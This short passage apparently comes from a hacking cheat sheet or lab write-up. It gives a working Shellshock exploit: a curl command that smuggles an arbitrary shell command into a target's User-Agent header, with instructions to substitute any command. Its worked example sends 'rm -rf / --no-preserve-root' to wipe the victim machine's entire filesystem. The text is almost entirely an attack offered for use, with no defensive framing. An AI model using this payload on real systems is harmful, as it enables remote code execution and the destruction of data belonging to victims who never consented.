There's a really good CloudFlare article on Shellshock here.

curl -H "User-Agent: () { :; }; <command>" http://TARGET_IP/

Replace <command> with the command you want to execute on the victim machine.

For example:

curl -H "User-Agent: () { :; }; /bin/rm -rf / --no-preserve-root" http://TARGET_IP/